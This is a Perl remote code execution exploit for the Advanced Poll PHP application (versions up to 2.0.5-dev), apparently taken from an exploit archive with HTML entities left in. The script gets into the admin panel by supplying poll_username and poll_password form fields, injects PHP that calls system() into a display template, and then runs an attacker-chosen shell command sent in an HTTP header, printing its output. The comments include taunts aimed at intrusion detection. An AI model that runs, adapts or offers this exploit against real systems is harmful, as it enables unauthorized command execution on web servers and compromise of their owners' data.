Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit

                                                #!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
# 
#&nbsp;diwou&nbsp;<[email protected]>
#
#&nbsp;PHCKSEC&nbsp;(c)&nbsp;2001-2006.
#
#&nbsp;Hey,&nbsp;what&nbsp;a&nbsp;mad&nbsp;world!
#

use&nbsp;strict;
use&nbsp;warnings;
use&nbsp;LWP::UserAgent;
use&nbsp;MD5;

#
#&nbsp;args:&nbsp;http://url/apoll_path&nbsp;cmd
#
#&nbsp;proxy:&nbsp;export&nbsp;PROXY=\'http|https://www.my.big.and.famous.proxy:8080/\'
#&nbsp;url:&nbsp;http|https://tatget:(port)/phppoll/
#

die(\"RTFC!&nbsp;;)\")&nbsp;unless(@ARGV>1);

my&nbsp;($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]);

my&nbsp;%ipost=
(
	poll_tplset&nbsp;=>&nbsp;\'default\',
	\'tpl[display_head.html]\'&nbsp;=>
<<HEAD
\\\".system(getenv(HTTP_PHP)).exit().\\\"
<table&nbsp;width=\"$pollvars[table_width]\"&nbsp;border=\"0\"&nbsp;cellspacing=\"0\"&nbsp;cellpadding=\"1\"&nbsp;bgcolor=\"$pollvars[bgcolor_fr]\">
&nbsp;&nbsp;<tr&nbsp;align=\"center\">
&nbsp;&nbsp;&nbsp;&nbsp;<td><style&nbsp;type=\"text/css\">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<!--
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.input&nbsp;{&nbsp;font-family:&nbsp;$pollvars[font_face];&nbsp;font-size:&nbsp;8pt}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.links&nbsp;{&nbsp;font-family:&nbsp;$pollvars[font_face];&nbsp;font-size:&nbsp;7.5pt;&nbsp;color:&nbsp;$pollvars[font_color]}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-->
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</style><font&nbsp;face=\"$pollvars[font_face]\"&nbsp;size=\"-1\"&nbsp;color=\"#FFFFFF\"><b>$pollvars[title]</b></font></td>
&nbsp;&nbsp;</tr>
&nbsp;&nbsp;<tr&nbsp;align=\"center\">
&nbsp;&nbsp;&nbsp;&nbsp;<td>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<table&nbsp;width=\"100%\"&nbsp;border=\"0\"&nbsp;cellspacing=\"0\"&nbsp;cellpadding=\"2\"&nbsp;align=\"center\"&nbsp;bgcolor=\"$pollvars[bgcolor_tab]\">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<tr>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<td&nbsp;height=\"40\"&nbsp;valign=\"middle\"><font&nbsp;face=\"$pollvars[font_face]\"&nbsp;color=\"$pollvars[font_color]\"&nbsp;size=\"1\"><b>$question</b></font></td>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tr>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<tr&nbsp;align=\"right\"&nbsp;valign=\"top\">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<td>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<form&nbsp;method=\"post\"&nbsp;action=\"$this->form_forward\">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<table&nbsp;width=\"100%\"&nbsp;border=\"0\"&nbsp;cellspacing=\"0\"&nbsp;cellpadding=\"0\"&nbsp;align=\"center\">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<tr&nbsp;valign=\"top\"&nbsp;align=\"center\">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<td>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<table&nbsp;width=\"100%\"&nbsp;border=\"0\"&nbsp;cellspacing=\"0\"&nbsp;cellpadding=\"1\"&nbsp;align=\"center\">
HEAD
,
	action&nbsp;&nbsp;&nbsp;=>&nbsp;&nbsp;\'\',
	tplset&nbsp;&nbsp;&nbsp;=>&nbsp;&nbsp;\'default\',
	tpl_type&nbsp;=>&nbsp;&nbsp;\'display\',
	session&nbsp;&nbsp;=>&nbsp;&nbsp;\'\',
	uid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;&nbsp;1
);

my&nbsp;%epost=
(
	session&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\'\',
	uid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;1,
	poll_tplst&nbsp;=>&nbsp;\'default\',
	tpl_type&nbsp;&nbsp;&nbsp;=>&nbsp;\'display\',
);

my&nbsp;%zday=
(
	username&nbsp;=>&nbsp;\'jakahw4nk4h\',
	\'pollvars[poll_username]\'&nbsp;=>&nbsp;\'jakahw4nk4h\',
	password&nbsp;=>&nbsp;\'fuckoff\',
	\'pollvars[poll_password]\'&nbsp;=>&nbsp;\'\'
);

$zday{\'pollvars[poll_password]\'}=&md5($zday{password});
$agent=\"Hey&nbsp;IDS!&nbsp;i\'m&nbsp;gonna&nbsp;fuck&nbsp;your&nbsp;advanced&nbsp;poll&nbsp;right?&nbsp;B===D\";&nbsp;#&nbsp;post&nbsp;method&nbsp;doesnt&nbsp;log&nbsp;it,&nbsp;so&nbsp;doesnt&nbsp;matter.
#$agent=\"Mozilla/5.0&nbsp;(X11;&nbsp;U;&nbsp;Linux&nbsp;i686;&nbsp;en-US;&nbsp;rv:1.8.0.1)&nbsp;Gecko/20060124&nbsp;Firefox/1.5.0.1\";

$lwp=new&nbsp;LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed([\'http\',\'https\']);

if($ENV{PROXY})
{
	$lwp->proxy([\'http\',\'https\'],$ENV{PROXY});
	print&nbsp;\"Using&nbsp;proxy&nbsp;\".$ENV{PROXY}.\"
\";
}

$url.=\"/\"&nbsp;if($url!~//$/);
$url.=\"admin/index.php\";
print&nbsp;\"Doing&nbsp;some&nbsp;pretty&nbsp;with&nbsp;\".$url.\"...

\";

print&nbsp;\"+&nbsp;generating&nbsp;session...
\";
$out=$lwp->post($url,\\%zday)->content();
if($out=~&nbsp;/index.php?session=((.){32})/)
{
	$ipost{\'session\'}=$epost{\'session\'}=$1;
	print&nbsp;\"&nbsp;&nbsp;session:&nbsp;\".$ipost{\'session\'}.\"
\";
	
	$url=~s/index.php/admin_templates.php/g;
	print&nbsp;\"+&nbsp;injecting&nbsp;diplay_head.html&nbsp;template...
\";
	$out=$lwp->post($url,\\%ipost)->content();
	$epost{\'action\'}=$1&nbsp;if($out=~&nbsp;/<input&nbsp;type=\"submit\"&nbsp;name=\"action\"&nbsp;value=\"(.*)\"&nbsp;class=\"button\">/);
	print&nbsp;\"&nbsp;&nbsp;button:&nbsp;\".$epost{\'action\'}.\"
\";

	$url=~s/admin_templates.php/admin_preview.php/g;
	print&nbsp;\"+&nbsp;executing...
\";
	$out=$lwp->post($url,\\%epost,PHP&nbsp;=>&nbsp;\"echo&nbsp;BOCE;\".$cmd.\";echo&nbsp;EOCE\")->content();

	print&nbsp;\"--&nbsp;BOCE&nbsp;--
\";
	foreach&nbsp;$out&nbsp;(split(/
/,$out))
	{
		$res=1,next&nbsp;if($out=~/BOCE/);
		$res=0,next&nbsp;if($out=~/EOCE/);
		print&nbsp;$out.\"
\"&nbsp;if($res);
	}
	print&nbsp;\"--&nbsp;EOCE&nbsp;--
\";
}
else
{
	print&nbsp;\"don\'t&nbsp;worry,&nbsp;u&nbsp;can&nbsp;improve&nbsp;me!&nbsp;eh&nbsp;eh&nbsp;eh&nbsp;:D?
\";
}

sub&nbsp;md5
{
	$_=new&nbsp;MD5;
	$_->add(@_);
	return&nbsp;unpack(\"H*\",$_->digest());
}

&nbsp;